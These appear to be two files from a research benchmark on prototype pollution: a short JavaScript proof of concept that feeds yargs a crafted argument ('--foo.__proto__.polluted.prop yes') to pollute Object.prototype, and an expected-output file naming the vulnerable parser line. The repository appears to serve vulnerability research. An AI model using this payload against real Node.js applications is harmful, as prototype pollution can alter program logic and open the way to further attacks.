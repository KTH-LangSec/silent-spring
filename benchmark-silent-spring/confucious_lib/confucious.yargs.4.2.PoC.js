const yargs = require("yargs");
yargs("--foo.__proto__.polluted.prop yes").argv;
