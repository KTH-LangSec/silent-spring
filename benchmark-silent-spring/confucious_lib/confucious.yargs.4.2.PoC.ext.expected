node_modules/yargs/lib/parser.js:419:40